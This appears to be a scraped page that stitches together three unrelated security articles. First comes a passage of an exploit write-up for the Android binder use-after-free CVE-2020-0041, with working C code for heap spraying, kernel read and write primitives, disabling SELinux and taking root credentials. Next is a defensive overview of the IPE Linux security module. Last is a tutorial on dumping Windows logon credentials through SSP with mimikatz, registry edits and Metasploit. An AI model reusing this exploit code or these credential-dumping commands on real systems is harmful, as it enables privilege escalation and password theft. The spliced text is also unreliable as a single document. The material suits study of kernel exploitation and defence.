| 8 */ struct list_head *next; /* 120 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } async_todo; /* total size (bytes): 128 */ } Therefore, we need to find objects that we can allocate and free at will, and that contain interesting data at 
these offsets. When we originally reported this bug to Google we produced a minimal exploit that overwrote selinux_enforcing, and we used a kgsl_drawobj_sync which would leak a pointer to itself and a pointer to a kernel function. This was enough for that minimal proof of concept, but not for a full root exploit as we are describing here. For the full exploit, we used the same object as in our CVE-2019-2025 exploit: the epitem structure used to track watched files within eventpoll: (gdb) pt /o struct epitem /* offset | size */ type = struct epitem { /* 0 | 24 */ union { /* 24 */ struct rb_node { /* 0 | 8 */ unsigned long __rb_parent_color; /* 8 | 8 */ struct rb_node *rb_right; /* 16 | 8 */ struct rb_node *rb_left; /* total size (bytes): 24 */ } rbn; /* 16 */ struct callback_head { /* 0 | 8 */ struct callback_head *next; /* 8 | 8 */ void (*func)(struct callback_head *); /* total size (bytes): 16 */ } rcu; /* total size (bytes): 24 */ }; /* 24 | 16 */ struct list_head { /* 24 | 8 */ struct list_head *next; /* 32 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } rdllink; /* 40 | 8 */ struct epitem *next; /* 48 | 12 */ struct epoll_filefd { /* 48 | 8 */ struct file *file; /* 56 | 4 */ int fd; /* total size (bytes): 12 */ } ffd; /* 60 | 4 */ int nwait; /* 64 | 16 */ struct list_head { /* 64 | 8 */ struct list_head *next; /* 72 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } pwqlist; /* 80 | 8 */ struct eventpoll *ep; /* 88 | 16 */ struct list_head { /* 88 | 8 */ struct list_head *next; /* 96 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } fllink; /* 104 | 8 */ struct wakeup_source *ws; /* 112 | 16 */ struct epoll_event { /* 112 | 4 */ __u32 events; /* XXX 4-byte hole */ /* 120 | 8 */ __u64 data; /* total size (bytes): 16 */ } event; /* total size (bytes): 128 */ } As can be seen above, the fllink linked list overlaps with the leaked fields. This list is used by eventpoll to link all epitem structures that are watching the same struct file. Thus, we can leak a pair of kernel pointers. There are several possibilities here, but let's consider how the data structures look like if we have only one such epitem structure for a particular struct file: Therefore, should we leak the fllink contents for the epitem in the picture above, we would learn two identical pointers into the file structure. Now consider what happens if we have a second epitem on the same file: In this case, if we leak from both epitem at the same time, we'd be learning their addresses as well as the address of the corresponding struct file. In our exploit we use both these tricks to disclose a struct file pointer and the address of the freed nodes before using them for the write primitive. Note however that in order to leak data, we need to leave a pending transaction queued until we can trigger the bug and free the binder_node. The exploit does this by having dedicated threads for each pending transaction, and then decrementing the reference count as many times as required to free the node. After this happens, we can leak from the freed buffer at any time we like, as many times as pending transactions we have created. Memory write primitive In order to identify a memory write primitive, we turn to another use of the transaction->target_node field: the decrement of the reference count in binder_transaction_buffer_release discussed earlier. Assume we have replaced the freed node with a fully controlled object. 
In this case, the driver decrements the reference count of the node with the following code: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 static bool binder_dec_node_nilocked(struct binder_node *node, int strong, int internal) { struct binder_proc *proc = node->proc; assert_spin_locked(&node->lock); if (proc) assert_spin_locked(&proc->inner_lock); if (strong) { if (internal) node->internal_strong_refs--; else node->local_strong_refs--; if (node->local_strong_refs || node->internal_strong_refs) return false; } else { if (!internal) node->local_weak_refs--; if (node->local_weak_refs || node->tmp_refs || !hlist_empty(&node->refs)) return false; } if (proc && (node->has_strong_ref || node->has_weak_ref)) { if (list_empty(&node->work.entry)) { binder_enqueue_work_ilocked(&node->work, &proc->todo); binder_wakeup_proc_ilocked(proc); } [1] } else { if (hlist_empty(&node->refs) && !node->local_strong_refs && !node->local_weak_refs && !node->tmp_refs) { if (proc) { binder_dequeue_work_ilocked(&node->work); rb_erase(&node->rb_node, &proc->nodes); binder_debug(BINDER_DEBUG_INTERNAL_REFS, "refless node %d deleted\n", node->debug_id); } else { [2] BUG_ON(!list_empty(&node->work.entry)); spin_lock(&binder_dead_nodes_lock); /* * tmp_refs could have changed so * check it again */ if (node->tmp_refs) { spin_unlock(&binder_dead_nodes_lock); return false; } [3] hlist_del(&node->dead_node); spin_unlock(&binder_dead_nodes_lock); binder_debug(BINDER_DEBUG_INTERNAL_REFS, "dead node %d deleted\n", node->debug_id); } return true; } } return false; } We can setup the node data such that we reach the else branch at [1] and ensure that node->proc is NULL. In that case we first reach the list_empty check at [2]. To bypass this check we need to setup an empty list (i.e. next and prev point to the list_head itself), which is why we require to leak the node address first. Once we've bypassed the check at [2], we can reach the hlist_del at [3] with controlled data. The function performs the following operations: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 static inline void __hlist_del(struct hlist_node *n) { struct hlist_node *next = n->next; struct hlist_node **pprev = n->pprev; WRITE_ONCE(*pprev, next); if (next) next->pprev = pprev; } static inline void hlist_del(struct hlist_node *n) { __hlist_del(n); n->next = LIST_POISON1; n->pprev = LIST_POISON2; } This boils down to the classic unlink primitive where we can set *X = Y and *(Y+8) = X. Therefore, having two writable kernel addresses we can corrupt some of their data using this. Additionally, if we set next = NULL we can perform a single 8-byte NULL write by having just one kernel address. Reallocating freed nodes with arbitrary contents The steps for obtaining an unlink primitive leading to memory corrupion described above assume we can replace the freed object by a controlled object. We do not need full control of the object, but just enough to pass all the checks and trigger the hlist_del primitive without crashing. In order to achieve that, we used a well known technique: spraying with control messages through the sendmsg syscall. 
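For readers unfamiliar with this style of spray, the userspace side can be sketched roughly as follows. This is a simplified illustration and not the exploit's actual code (that lives in the repository linked at the end): it assumes a unix socketpair whose send buffer is first filled, so that a final blocking sendmsg() call keeps its 128-byte control buffer (the same kmalloc-128 cache that backs the 128-byte struct binder_node) alive in kernel memory for as long as we want. The filler byte 0x42 is a placeholder for whatever fake binder_node contents are needed.

#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>

#define SPRAY_SIZE 128          /* lands in kmalloc-128, like struct binder_node */

static int sv[2];               /* sv[0]: sender, sv[1]: receiver */

static void *spray_thread(void *arg)
{
    char cbuf[SPRAY_SIZE];
    struct cmsghdr *cm = (struct cmsghdr *)cbuf;
    char c = 'A';
    struct iovec iov = { .iov_base = &c, .iov_len = 1 };
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = cbuf, .msg_controllen = sizeof(cbuf),
    };

    /* The first 16 bytes must look like a sane cmsg header that the kernel's
     * __scm_send() will simply skip: a valid length and a level other than
     * SOL_SOCKET. Everything after the header is fully controlled. */
    cm->cmsg_len   = sizeof(cbuf);
    cm->cmsg_level = SOL_SOCKET + 1;
    cm->cmsg_type  = 0x41414141;
    memset(cbuf + sizeof(*cm), 0x42, sizeof(cbuf) - sizeof(*cm));

    /* Fill the socket with non-blocking sends until it would block... */
    while (send(sv[0], &c, 1, MSG_DONTWAIT) > 0)
        ;

    /* ...then block inside sendmsg() after the control buffer has been copied
     * into the kernel. It stays allocated until the peer drains the socket. */
    sendmsg(sv[0], &msg, 0);
    return NULL;
}

int main(void)
{
    pthread_t th;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv))
        return 1;
    pthread_create(&th, NULL, spray_thread, NULL);

    /* Trigger the binder_node free here, then use the leak primitive to check
     * whether one of the sprayed buffers replaced it. Reading from sv[1] later
     * unblocks the thread and releases the allocation again. */
    pause();
    return 0;
}

In the real exploit one such thread is used per allocation so that each sprayed object can be kept alive or released independently.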
The code for this system call looks as follows: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 static int ___sys_sendmsg(struct socket *sock, struct user_msghdr __user *msg, struct msghdr *msg_sys, unsigned int flags, struct used_address *used_address, unsigned int allowed_msghdr_flags) { struct compat_msghdr __user *msg_compat = (struct compat_msghdr __user *)msg; struct sockaddr_storage address; struct iovec iovstack[UIO_FASTIOV], *iov = iovstack; unsigned char ctl[sizeof(struct cmsghdr) + 20] __attribute__ ((aligned(sizeof(__kernel_size_t)))); /* 20 is size of ipv6_pktinfo */ unsigned char *ctl_buf = ctl; int ctl_len; ssize_t err; ... if (ctl_len > sizeof(ctl)) { [1] ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL); if (ctl_buf == NULL) goto out_freeiov; } err = -EFAULT; /* * Careful! Before this, msg_sys->msg_control contains a user pointer. * Afterwards, it will be a kernel pointer. Thus the compiler-assisted * checking falls down on this. */ [2] if (copy_from_user(ctl_buf, (void __user __force *)msg_sys->msg_control, ctl_len)) goto out_freectl; msg_sys->msg_control = ctl_buf; } ... out_freectl: if (ctl_buf != ctl) [3] sock_kfree_s(sock->sk, ctl_buf, ctl_len); out_freeiov: kfree(iov); return err; } At [1] a buffer is allocated on the kernel heap if the requested control message length is larger than the local ctl buffer. At [2] the control message is copied in from userland, and finally after the message is processed the allocated buffer is freed at [3]. We use a blocking call to make the system call block once the destination socket buffer is full, therefore blocking after the thread between points [2] and [3]. In this way we can control the lifetime of the replacement object. We could also make use of the approach used by Jann Horn in his PROCA exploit: let the sendmsg call complete, and immediately reallocate the object with e.g. a signalfd file descriptor. This would have the advantage of not needing a separate thread for each allocation, but otherwise the results should be fairly similar. In any case, using this type of spraying we can reallocate the freed binder_node with almost complete control, as we require in order to trigger the write primitives described earlier. One thing to note though is that if our spray fails, we'll end up crashing the kernel because of the amount of operations and checks being performed on the freed memory. However, this use-after-free has the very nice property that as long as we do not trigger the write primitive, we can simply close the binder file descriptor and the kernel won't notice any effects. Thus, before we try to trigger a write primitive, we use the leak primitive to verify that we have successfully reallocated the node. We can do this by simply having a large amount of pending transactions, and reading one each time we need to leak some data off the freed object. If the data is not what we expected, we can simply close the binder file descriptor and try again. This property makes the exploit quite reliable even in the presence of relatively unreliable reallocations. Obtaining an arbitrary read primitive At this point, we use the same arbitrary read technique as described in the OffensiveCon 2020 talk. 
That is, we corrupt file->f_inode and use the following code to perform reads: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 int do_vfs_ioctl(struct file *filp, unsigned int fd, unsigned int cmd, unsigned long arg) { int error = 0; int __user *argp = (int __user *)arg; struct inode *inode = file_inode(filp); switch (cmd) { ... case FIGETBSZ: return put_user(inode->i_sb->s_blocksize, argp); ... If you looked at our slides, back in late 2018 we used a binder mapping spray to bypass PAN and have controlled data at a controlled location. However, the bug we are exploiting here was introduced while getting rid of the long-term kernel-side binder mappings. This means we cannot use binder mapping sprays anymore, and we must find another solution. The solution we came up with was pointing our f_inode field right into an epitem structure. This structure contains a completely controllable 64-bit field: the event.data field. We can modify this field by using ep_ctl(efd, EPOLL_CTL_MOD, fd, &event). Thus, if we line up the data field with the inode->i_sb field we'll be able to perform an arbitrary read. The following picture shows the setup graphically: Note how we have also corrupted the fllink.next field of the epitem, which now points back into the file->f_inode field due to our write primitive. This could be a problem if this field is ever used, but because we are the only users of these struct file and epitem instances, we just need to avoid calling any API that makes use of them and we'll be fine. Based on the setup depicted above, we can now construct an arbitrary read primitive as follows: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 uint64_t read32(uint64_t addr) { struct epoll_event evt; evt.events = 0; evt.data.u64 = addr - 24; int err = epoll_ctl(file->ep_fd, EPOLL_CTL_MOD, pipes[0], &evt); uint32_t test = 0xdeadbeef; ioctl(pipes[0], FIGETBSZ, &test); return test; } uint64_t read64(uint64_t addr) { uint32_t lo = read32(addr); uint32_t hi = read32(addr+4); return (((uint64_t)hi) << 32) | lo; } Note that we set the data field of the epitem to addr - 24, where 24 is the offset of s_blocksize within the superblock structure. Also, even though s_blocksize is in principle 64-bit long, the ioctl code only copies 32-bits back to userland so we need to read twice if we want to read 64 bit values. Now that we have an arbitrary read and we know the address of a struct file from our initial leak, we can simply read its f_op field to retrieve a kernel .text pointer. This then leads to fully bypassing KASLR: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 /* Step 1: leak a pipe file address */ file = node_new("leak_file"); /* Only works on file implementing the 'epoll' function. */ while (!node_realloc_epitem(file, pipes[0])) node_reset(file); uint64_t file_addr = file->file_addr; log_info("[+] pipe file: 0x%lx\n", file_addr); /* Step 2: leak epitem address */ struct exp_node *epitem_node = node_new("epitem"); while (!node_kaddr_disclose(file, epitem_node)) node_reset(epitem_node); printf("[*] file epitem at %lx\n", file->kaddr); /* * Alright, now we want to do a write8 to set file->f_inode. * Given the unlink primitive, we'll set file->f_inode = epitem + 80 * and epitem + 88 = &file->f_inode. * * With this we can change f_inode->i_sb by modifying the epitem data, * and get an arbitrary read through ioctl. * * This is corrupting the fllink, so we better don't touch anything there! 
*/ struct exp_node *write8_inode = node_new("write8_inode"); node_write8(write8_inode, file->kaddr + 120 - 40 , file_addr + 0x20); printf("[*] Write done, should have arbitrary read now.\n"); uint64_t fop = read64(file_addr + 0x28); printf("[+] file operations: %lx\n", fop); kernel_base = fop - OFFSET_PIPE_FOP; printf("[+] kernel base: %lx\n", kernel_base); Disabling SELinux and setting up an arbitrary write primitive Now that we know the kernel base address, we can use our write primitive to write a NULL qword over the selinux_enforcing variable and set SELinux to permissive mode. Our exploit does this before setting up an arbitrary write primitive, because the technique we came up with actually requires disabling SELinux. After considering a few alternatives, we ended up settling for attacking the sysctl tables the kernel uses to handle /proc/sys and all the data hanging from there. There are a number of global tables describing these variables, such as kern_table below: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 static struct ctl_table kern_table[] = { { .procname = "sched_child_runs_first", .data = &sysctl_sched_child_runs_first, .maxlen = sizeof(unsigned int), .mode = 0644, .proc_handler = proc_dointvec, }, #if defined(CONFIG_PREEMPT_TRACER) || defined(CONFIG_IRQSOFF_TRACER) { .procname = "preemptoff_tracing_threshold_ns", .data = &sysctl_preemptoff_tracing_threshold_ns, .maxlen = sizeof(unsigned int), .mode = 0644, .proc_handler = proc_dointvec, }, { .procname = "irqsoff_tracing_threshold_ns", .data = &sysctl_irqsoff_tracing_threshold_ns, .maxlen = sizeof(unsigned int), .mode = 0644, .proc_handler = proc_dointvec, }, ... For example, the first variable is called "sched_child_runs_first", which means it can be accessed through /proc/sys/kernel/sched_child_runs_first. The file mode is 0644, so it's writable for root only (of course SELinux restrictions may apply) and it's an integer. The reading and writing is handled by the proc_dointvec function, which will convert the integer to and from string representation when the file is accessed. The data field points to where the variable is found in memory, which makes it an interesting target to obtain an arbitrary read/write primitive. We initially tried to target some of these variables, but then realized that this table is actually only used during kernel initialization. This means that corrupting the contents of this table is not very useful to us. However, this table is used to create a set of in-memory structures that define the existing sysctl variables and their permissions. These structures can be found by analyzing the sysctl_table_root structure, which contains an rb-tree of ctl_node nodes, which then point to ctl_table tables defining the variables themselves. Since we have a read primitive, we can parse the tree and find the left-most node within it, which has no children nodes. Under normal circumstances, this tree looks as shown in the picture below (only representing left-child connections to keep the diagram somewhat readable): If you look at the alphabetic order of these nodes, you can see that all left-child nodes are sorted in descending alphabetic order. In fact, this is the balancing rule in these trees: left-children have to be lower than the current node, and right-children higher. Thus, to ensure we keep the tree balanced, we add a left child to the left-most node with a name starting with "aaa" using our write8 primitive. 
The following code finds the left-most node of the tree in prev_node, which will be the insertion point for our fake node: 1 2 3 4 5 6 7 8 9 10 11 12 /* Now we can prepare our magic sysctl node as s child of the left-most node */ uint64_t sysctl_table_root = kernel_base + SYSCTL_TABLE_ROOT_OFFSET; printf("[+] sysctl_table_root = %lx\n", sysctl_table_root); uint64_t ctl_dir = sysctl_table_root + 8; uint64_t node = read64(ctl_dir + 80); uint64_t prev_node; while (node != 0) { prev_node = node; node = read64(node + 0x10); } In order to insert the new node, we need to find a location within kernel memory for it. This is required because modern phones come with PAN (Privileged Access Never) enabled, which prevents the kernel from inadvertently using userland memory. Given that we have an arbitrary read primitive, we sort this out by parsing our process' page tables starting at current->mm->pgd and locating the address of one of our pages in the physmap. Additionally, using the physmap alias of our own userspace page is ideal because we can easily edit the nodes to change the address of the data we want to target, giving us a flexible read/write primitive. We resolve the physmap alias in the following way: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 /* Now resolve our mapping at 2MB. But first read memstart_addr so we can do phys_to_virt() */ memstart_addr = read64(kernel_base + MEMSTART_ADDR_OFFSET); printf("[+] memstart_addr: 0x%lx\n", memstart_addr); uint64_t mm = read64(current + MM_OFFSET); uint64_t pgd = read64(mm + 0x40); uint64_t entry = read64(pgd); uint64_t next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); printf("[+] First level entry: %lx -> next table at %lx\n", entry, next_tbl); /* Offset 8 for 2MB boundary */ entry = read64(next_tbl + 8); next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); printf("[+] Second level entry: %lx -> next table at %lx\n", entry, next_tbl); entry = read64(next_tbl); uint64_t kaddr = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); *(uint64_t *)map = 0xdeadbeefbadc0ded; if ( read64(kaddr) != 0xdeadbeefbadc0ded) { printf("[!] Something went wrong resolving the address of our mapping\n"); goto out; } Note we required to read the contents of memstart_addr in order to be able to translate between physical addresses and the corresponding physmap address. In any case, after running this code we know that the data we find at 0x200000 in our process address space can also be found at kaddr in kernel land. 
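The phys_to_virt() helper used in the snippet above is not shown in the excerpt; on arm64 it boils down to rebasing a physical address onto the kernel's linear mapping. A minimal sketch of what such a helper might look like is shown below. The PAGE_OFFSET constant is an assumption for a 39-bit VA kernel (as typically configured on the Pixel 3) and is not taken from the post; memstart_addr is the value read out of the kernel as shown above.

#include <stdint.h>

#define PAGE_OFFSET 0xffffffc000000000UL   /* assumes CONFIG_ARM64_VA_BITS=39 */

static uint64_t memstart_addr;             /* filled in via the arbitrary read */

static uint64_t phys_to_virt(uint64_t phys)
{
    /* arm64: __phys_to_virt(x) = (x - PHYS_OFFSET) | PAGE_OFFSET,
     * where PHYS_OFFSET is the kernel's memstart_addr. */
    return (phys - memstart_addr) | PAGE_OFFSET;
}

/* A page-table entry carries a physical address in bits [47:12]; masking and
 * shifting it as in the walk above and applying phys_to_virt() yields the
 * physmap alias of the next-level table or of the final data page. */
static uint64_t entry_to_virt(uint64_t entry)
{
    return phys_to_virt(((entry & 0xffffffffffffUL) >> 12) << 12);
}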
With this, we setup a new sysctl node as follows:

/* We found the insertion place, setup the node */
uint64_t node_kaddr = kaddr;
void *node_uaddr = map;

uint64_t tbl_header_kaddr = kaddr + 0x80;
void *tbl_header_uaddr = map + 0x80;

uint64_t ctl_table_kaddr = kaddr + 0x100;
ctl_table_uaddr = map + 0x100;

uint64_t procname_kaddr = kaddr + 0x200;
void * procname_uaddr = map + 0x200;

/* Setup rb_node */
*(uint64_t *)(node_uaddr + 0x00) = prev_node;        // parent = prev_node
*(uint64_t *)(node_uaddr + 0x08) = 0;                // right = null
*(uint64_t *)(node_uaddr + 0x10) = 0;                // left = null
*(uint64_t *)(node_uaddr + 0x18) = tbl_header_kaddr; // my_tbl_header

*(uint64_t *)(tbl_header_uaddr) = ctl_table_kaddr;
*(uint64_t *)(tbl_header_uaddr + 0x18) = 0;                     // unregistering
*(uint64_t *)(tbl_header_uaddr + 0x20) = 0;                     // ctl_Table_arg
*(uint64_t *)(tbl_header_uaddr + 0x28) = sysctl_table_root;     // root
*(uint64_t *)(tbl_header_uaddr + 0x30) = sysctl_table_root;     // set
*(uint64_t *)(tbl_header_uaddr + 0x38) = sysctl_table_root + 8; // parent
*(uint64_t *)(tbl_header_uaddr + 0x40) = node_kaddr;            // node
*(uint64_t *)(tbl_header_uaddr + 0x48) = 0;                     // inodes.first

/* Now setup ctl_table */
uint64_t proc_douintvec = kernel_base + PROC_DOUINTVEC_OFFSET;

*(uint64_t *)(ctl_table_uaddr) = procname_kaddr;        // procname
*(uint64_t *)(ctl_table_uaddr + 8) = kernel_base;       // data == what to read/write
*(uint32_t *)(ctl_table_uaddr + 16) = 0x8;              // max size
*(uint64_t *)(ctl_table_uaddr + 0x20) = proc_douintvec; // proc_handler
*(uint32_t *)(ctl_table_uaddr + 20) = 0666;             // mode = rw-rw-rw-

/*
 * Compute and write the node name. We use a random name starting with aaa
 * for two reasons:
 *
 * - Must be the first node in the tree alphabetically given where we insert it (hence aaa...)
 *
 * - If we already run, there's a cached dentry for each name we used earlier which has dangling
 *   pointers but is only reachable through path lookup. If we'd reuse the name, we'd crash using
 *   this dangling pointer at open time.
 *
 * It's easier to have a unique enough name instead of figuring out how to clear the cache,
 * which would be the cleaner solution here.
 */
int fd = open("/dev/urandom", O_RDONLY);
uint32_t rnd;
read(fd, &rnd, sizeof(rnd));
sprintf(procname_uaddr, "aaa_%x", rnd);
sprintf(pathname, "/proc/sys/%s", procname_uaddr);

/* And finally use a write8 to inject this new sysctl node */
struct exp_node *write8_sysctl = node_new("write8_sysctl");
node_write8(write8_sysctl, kaddr, prev_node + 16);

This basically creates one file at /proc/sys/aaa_[random], with read/write permissions, and uses proc_douintvec to handle read/writes. This function will take the data field as the pointer to read from or write to, and allow up to max_size bytes to be read or written as unsigned integers. With this, we can setup a write primitive as follows:

void write64(uint64_t addr, uint64_t value) {
    *(uint64_t *)(ctl_table_uaddr + 8) = addr; // data == what to read/write
    *(uint32_t *)(ctl_table_uaddr + 16) = 0x8;

    char buf[100];
    int fd = open(pathname, O_WRONLY);
    if (fd < 0) {
        printf("[!] Failed to open. Errno: %d\n", errno);
    }

    sprintf(buf, "%u %u\n", (uint32_t)value, (uint32_t)(value >> 32));
    int ret = write(fd, buf, strlen(buf));
    if (ret < 0)
        printf("[!] Failed to write, errno: %d\n", errno);

    close(fd);
}

void write32(uint64_t addr, uint32_t value) {
    *(uint64_t *)(ctl_table_uaddr + 8) = addr; // data == what to read/write
    *(uint32_t *)(ctl_table_uaddr + 16) = 4;

    char buf[100];
    int fd = open(pathname, O_WRONLY);
    sprintf(buf, "%u\n", value);
    write(fd, buf, strlen(buf));
    close(fd);
}

Getting root and cleaning up

Once we have read/write capabilities on a Pixel phone, obtaining root access is as simple as copying the credentials from a root task. Since we have already disabled SELinux earlier, we just need to find the init credentials, bump their reference count and copy them to our process like this:

/* Set refcount to 0x100 and set our own credentials to init's */
write32(init_cred, 0x100);
write64(current + REAL_CRED_OFFSET, init_cred);
write64(current + REAL_CRED_OFFSET + 8, init_cred);

if (getuid() != 0) {
    printf("[!!] Something went wrong, we're not root!!\n");
    goto out;
}

However this is not enough to enjoy a root shell yet, since we have corrupted quite some memory in kernel land and things will break as soon as we exit the current process and execute the shell. There are a few things that we need to repair:

- The binder_node structures we used to perform write primitives were reallocated through sendmsg, but have been freed again when performing the write. We need to make sure the corresponding threads do not free these objects again upon returning from sendmsg. For that, we parse the thread stacks and replace any references we find to these nodes by ZERO_SIZE_PTR.
- We have modified the f_inode of a struct file, which now points into the middle of an epitem. The easiest way around this is to simply bump the reference count for this file such that release is never called on it.
- While setting up the read primitive, we also corrupted a field in the epitem itself. This field was a linked list with one epitem only, so we can just copy the fllink.prev field on top of fllink.next to restore the list.
- We also added a fake entry to /proc/sys, which we could leave around ... but in that case it'd be pointing to pages that belonged to our exploit and are now recycled by the kernel. We decided to just remove it from the rb-tree. Note that this makes the entry disappear from the userland view, but there is still a cached path in the kernel. Since we used a randomized name, chances are small that anybody would try to access it in the future by directly opening it.

After cleaning all this mess up, we can finally execute our root shell and enjoy uid 0 without a crashing phone.

Demonstration video

The following video shows the process of rooting the phone from an adb shell using the exploit we just described:

Code

You can find the code for the exploits described in this and the previous post at the Blue Frost Security GitHub. The exploit has only been tested on a Pixel 3 phone using the firmware from February 2020, and would need to be adapted for other firmwares. In particular there are a number of kernel offsets used in the exploit, as well as structure offsets that may vary between kernel versions.

Sursa: https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/
-
Integrity Policy Enforcement (IPE) Overview IPE is a Linux Security Module, which allows for a configurable policy to enforce integrity requirements on the whole system. It attempts to solve the issue of code integrity: that any code being executed (or files being read), are identical to the version that was built by a trusted source. Simply stated, IPE helps the owner of a system ensure that only code they have authorized is allowed to execute. There are multiple implementations already within the Linux kernel that solve some measure of integrity verification. For instance, device-mapper verity, which ensures integrity for a block device, and fs-verity which is a system that ensures integrity for a filesystem. What these implementations lack is a measure of run-time verification that binaries are sourced from these locations. IPE aims to address this gap. IPE is separated between two major components: A configurable policy, provided by the LSM ("IPE Core"), and deterministic attributes provided by the kernel to evaluate files against, ("IPE Properties"). What is the value of code integrity? Code integrity is identified as one of the most effective security mitigations for modern systems. With Private Key Infrastructure and code signing you can effectively control the execution of all binaries on a system to be restricted to a known subset. This eliminates attacks such as: Linker hijacking (LD_PRELOAD, LD_AUDIT, DLL Injection) Binary rewriting Malicious binary execution / loading As a result, most of the low effort, high value attacks are mitigated completely. Use Cases IPE is designed for use in devices with a specific purpose like embedded systems (e.g. network firewall device in a data center), where all software and configuration is built and provisioned by the owner. Ideally, a system which leverages IPE is not intended for general purpose computing and does not utilize any software or configuration built by a third party. An ideal system to leverage IPE has both mutable and immutable components, however, all binary executable code is immutable. For the highest level of security, platform firmware should verify the the kernel and optionally the root filesystem (e.g. via U-Boot verified boot). This allows the entire system to be integrity verified. Known Gaps IPE cannot verify the integrity of anonymous executable memory, such as the trampolines created by gcc closures and libffi, or JIT'd code. Unfortunately, as this is dynamically generated code, there is no way for IPE to detect that this code has not been tampered with in transition from where it was built, to where it is running. As a result, IPE is incapable of tackling this problem for dynamically generated code. IPE cannot verify the integrity of interpreted languages' programs when these scripts invoked via <interpreter> <file>. This is because the way interpreters execute these files, the scripts themselves are not evaluated as executable code through one of IPE's hooks. Interpreters can be enlightened to the usage of IPE by trying to mmap a file into executable memory (+X), after opening the file and responding to the error code appropriately. This also applies to included files, or high value files, such as configuration files of critical system components. This specific gap is planned on being addressed within IPE. Sursa: https://microsoft.github.io/ipe/
-
Credential Dumping: Security Support Provider (SSP) posted inRed Teaming on April 8, 2020 by Raj Chandel SHARE In this article, we will dump the windows login credentials by exploiting SSP. This is our fourth article in the series of credential dumping. Both local and remote method is used in this article to cover every aspect of pentesting. Table of content: Introduction to Security Support Provider (SSP) Manual Mimikatz Metasploit Framework Koadic Powershell Empire Introduction to Security Support Provider Security Support Provider (SSP) is an API used by windows to carry out authentications of windows login. it’s DLL file that provides security packages to other applications. This DLL stack itself up in LSA when the system starts; making it a start-up process. After it is loaded in LSA, it can access all of the window’s credentials. The configurations of this file are stored in two different registry keys and you find them in the following locations: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages 1 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages Manual The first method that we are going to use to exploit SSP is manual. Once the method is successfully carried out and the system reboots itself, it will dump the credentials for us. These credentials can be found in a file that will be created upon user login with the name of kiwissp. This file can find in registry inside hklm\system\currentcontrolset\control\lsa. The first step in this method is to copy the mimilib.dll file from mimikatz folder to the system32 folder. This file is responsible for creating kiwissp file which stores credentials in plaintext for us. Then navigate yourself to hklm\system\currentcontrolset\control\lsa. And here you can find that there is no entry in Security Packages as shown in the image below: The same can be checked with the following PowerShell command: reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 1 reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" Just as shown in the image below, there is no entry. So, this needs to be changed if want to dump the credentials. We need to add all the services that helps SSP to manage credentials; such as Kerberos, wdigest etc. Therefore we will use the following command to make these entries: reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f 1 reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f And then to confirm whether the entry has been done or not, use the following command: reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 1 reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" You can then again navigate yourself to hklm\system\currentcontrolset\control\lsa to the enteries that you just made. Now, whenever the user reboots their PC, a file with the name of kiwissp.log will be created in system32. Then this file will have your credentials stored in cleartext. Use the following command to read the credentials: type C:\Windows\System32\kiwissp.log 1 type C:\Windows\System32\kiwissp.log Mimikatz Mimikatz provides us with a module that injects itself in the memory and when the user is signed out of the windows, then upon signing in the passwords are retrieved from the memory with the help of this module. 
For this method, just load mimikatz and type: privilege::debug misc::memssp 1 2 privilege::debug misc::memssp Running the above commands will create mimilsa.log file in system32 upon logging in by the user. To read this file use the following command; type C:\Windows\System32\mimilsa.log 1 type C:\Windows\System32\mimilsa.log Metasploit Framework When dumping credentials remotely, Metasploit really comes handy. The ability of Metasploit providing us with kiwi extension allows us to dump credentials by manipulating SSP just like our previous method. Now when you have meterpreter session through Metasploit use load kiwi command to initiate kiwi extension. And then to inject the mimikatz module in memory use the following command: kiwi_cmd misc::memssp 1 kiwi_cmd misc::memssp Now the module has been successfully injected in the memory. As this module creates the file with clear text credential when the user logs in after the memory injection; we will force the lock screen on the victim so that after login we can have our credentials. For this run the following commands: shell RunDll32.exe user32.dll,LockWorkStation 1 2 shell RunDll32.exe user32.dll,LockWorkStation Now we have forced the user to logout the system. Whenever the user will log in our mimilsa file will be created in the system32 and to read the file use the following command: type C:\Windows\System32\mimilsa.log 1 type C:\Windows\System32\mimilsa.log Koadic Just like Metasploit, Kodiac too provides us with similar mimikatz module; so, let’s get to dumping the credentials. Once you have a session with kodiac, use the following exploit to inject the payload in the memory: use 